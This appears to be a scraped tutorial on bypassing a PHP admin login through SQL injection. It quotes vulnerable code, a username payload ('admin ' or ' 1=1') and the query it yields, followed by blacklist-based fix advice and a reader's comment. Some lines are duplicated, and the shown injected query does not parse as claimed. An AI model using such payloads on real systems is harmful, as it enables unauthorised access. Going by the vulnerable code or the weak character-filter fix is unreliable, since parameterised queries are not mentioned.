- Code snippet from /admin/login.php
——————————————————————————————————————————
——————————————————————————————————————————
$postbruger = $_POST['username'];
$postpass = md5($_POST['password']);
$resultat = mysql_query(“SELECT * FROM ” . $tablestart . “login WHERE brugernavn = ‘$postbruger’ AND password = ‘$postpass’”)
or die(”
$postpass = md5($_POST['password']);
$resultat = mysql_query(“SELECT * FROM ” . $tablestart . “login WHERE brugernavn = ‘$postbruger’ AND password = ‘$postpass’”)
or die(”
” . mysql_error() . “\n”);
——————————————————————————————————————————
The variables isn’t properly checked.We can bypass this login.Lets inject the following username and password :
username : admin ‘ or ‘ 1=1
password : sirgod
password : sirgod
We logged in.Why?Look,the code will become
———————————————————————————————————————————
$resultat = mysql_query(“SELECT * FROM ” . $tablestart . “login WHERE brugernavn = ‘admin’ ‘ or ‘ 1=1 AND password = ‘sirgod’”)
———————————————————————————————————————————
$resultat = mysql_query(“SELECT * FROM ” . $tablestart . “login WHERE brugernavn = ‘admin’ ‘ or ‘ 1=1 AND password = ‘sirgod’”)
———————————————————————————————————————————
Login bypassed.The username must be an existent username.
How to fix?
Simple way : Don’t allow special chars in variables.For numeric variables
use (int) ,example $id=(int)$_GET['id'];
Another way : For non-numeric variables : filter all special chars used in
SQLI : – , . ( ) ‘ ” _ + / *
Simple way : Don’t allow special chars in variables.For numeric variables
use (int) ,example $id=(int)$_GET['id'];
Another way : For non-numeric variables : filter all special chars used in
SQLI : – , . ( ) ‘ ” _ + / *
how to use this code can anyone tell
ReplyDelete